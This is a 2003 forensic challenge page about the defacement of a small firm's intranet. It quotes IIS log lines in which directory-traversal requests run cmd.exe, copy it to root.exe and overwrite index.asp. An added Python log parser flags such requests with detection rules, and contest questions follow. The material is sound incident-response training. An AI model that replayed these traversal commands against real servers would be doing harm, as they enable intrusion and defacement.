
February '03 Forensic Challenge Contest

(Level: easy)

I. Alert

Given: It's 5:00a on January 6, 2003 and Mr. Bill Northlup (company president) arrives at work. Bill performs his normal routine and logs onto his system and network at 5:23a. He then opens his browser to the company Intranet to check the sales pipeline from the weekend, and in place of the usual welcome screen he sees:

rot in hell
we own you
your security sux


II. Background Information

Given: Northlup, Inc. is a small insurance broker in the Midwestern United States. Their network diagram is provided here and their Internet router configuration is provided here.


III. Evidence

Given: Log entries on the Intranet server contained the following:

2003-01-05 12:30:10 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-01-05 12:30:12 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2003-01-05 12:30:22 172.0.0.0 - 172.16.0.80 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2003-01-05 12:32:18 172.0.0.0 - 172.16.0.80 80 \
GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
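
As an added example (not part of the original contest page), the following Python script shows how a defender would parse log entries in the format above and flag the suspicious ones for review. It reads IIS W3C extended-format lines (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent), which is an assumption about the field layout), applies a few detection rules to each request, and summarises when the flagged activity started and stopped and which client addresses were involved. The sample lines embedded in the script are constructed to mirror the excerpt above, with two ordinary requests added around them; the defacement HTML placeholder is left as-is, so the parser has to tolerate a query string that contains spaces.

```python
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log mirroring the contest excerpt, with two benign
# requests (10.9.8.7) added around it.  Field layout is assumed to be the
# IIS W3C extended default.
SAMPLE_LOG = """\
2003-01-05 12:28:40 10.9.8.7 - 172.16.0.80 80 GET /default.asp - 200 -
2003-01-05 12:30:10 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-01-05 12:30:12 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\\ 200 -
2003-01-05 12:30:22 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\\winnt\\system32\\cmd.exe+root.exe 502 -
2003-01-05 12:32:18 172.0.0.0 - 172.16.0.80 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
2003-01-05 12:35:01 10.9.8.7 - 172.16.0.80 80 GET /images/logo.gif - 200 -
"""


@dataclass
class Entry:
    when: datetime
    client_ip: str
    method: str
    stem: str
    query: str
    status: int


@dataclass
class Finding:
    entry: Entry
    rules: list = field(default_factory=list)


def parse_line(line):
    """Split one W3C extended log line; return None for comments/short lines."""
    tokens = line.split()
    if len(tokens) < 11 or tokens[0].startswith("#"):
        return None
    date, time, c_ip, _user, _s_ip, _s_port, method, stem = tokens[:8]
    status, _agent = tokens[-2:]
    # A query string containing spaces is split into several tokens; rejoin it.
    query = " ".join(tokens[8:-2])
    when = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return Entry(when, c_ip, method, stem, query, int(status))


def normalize(stem):
    """One pass of percent-decoding, backslashes folded to slashes, case folded."""
    return unquote(stem).replace("\\", "/").lower()


def classify(entry):
    """Return the list of detection rules the request matches (empty if none)."""
    path = normalize(entry.stem)
    q = entry.query.lower()
    rules = []
    if "/../" in path:
        rules.append("TRAVERSAL: '..' segment in URI path")
    if path.endswith("/cmd.exe"):
        rules.append("CMD_EXE: command interpreter requested over HTTP")
    if path.startswith("/scripts/") and path.endswith(".exe"):
        rules.append("SCRIPTS_EXE: executable invoked from the scripts directory")
    if q.startswith("/c+") or q.startswith("/c "):
        rules.append("SHELL_SWITCH: cmd.exe '/c' switch passed as query string")
    return rules


def analyze(log_text):
    """Parse every line and keep only requests that trip at least one rule."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rules = classify(entry)
        if rules:
            findings.append(Finding(entry, rules))
    return findings


def summarize(findings):
    """Time window, client addresses and status codes of the flagged requests."""
    if not findings:
        return {"count": 0, "first": None, "last": None, "clients": [], "statuses": []}
    times = [f.entry.when for f in findings]
    return {
        "count": len(findings),
        "first": min(times).isoformat(sep=" "),
        "last": max(times).isoformat(sep=" "),
        "clients": sorted({f.entry.client_ip for f in findings}),
        "statuses": sorted({f.entry.status for f in findings}),
    }


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(h.entry.when, h.entry.client_ip, h.entry.status, h.entry.stem, h.entry.query)
        for r in h.rules:
            print("   ", r)
    print(summarize(hits))
```

The rules are deliberately broad: any request whose path still contains a ".." segment after decoding, any request for cmd.exe, any executable served out of the scripts directory, and any query string that starts with the "/c" switch. On a normal Intranet server none of these should ever fire, so the false-positive cost is low and the summary gives the start and end of the activity window and the source address straight from the log. Note that normalize() percent-decodes only once; a server that decodes twice, or accepts malformed encodings, needs a matching rule so that such requests are not missed.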

IV. Forensic Interrogation
(Answer these as completely and accurately as you can for your forensic solution. The first two entries with the most correct answers will be chosen as winners at the end of the month.)

  1. When did the Intranet web defacement take place (i.e. time and date)?

  2. How did the Intranet web defacement take effect (i.e. what steps were taken)?

  3. What vulnerability or exploit may have been involved?

  4. Where did the attack likely originate from?

Solution


Your February contest entry is FREE. Only your first submission will count.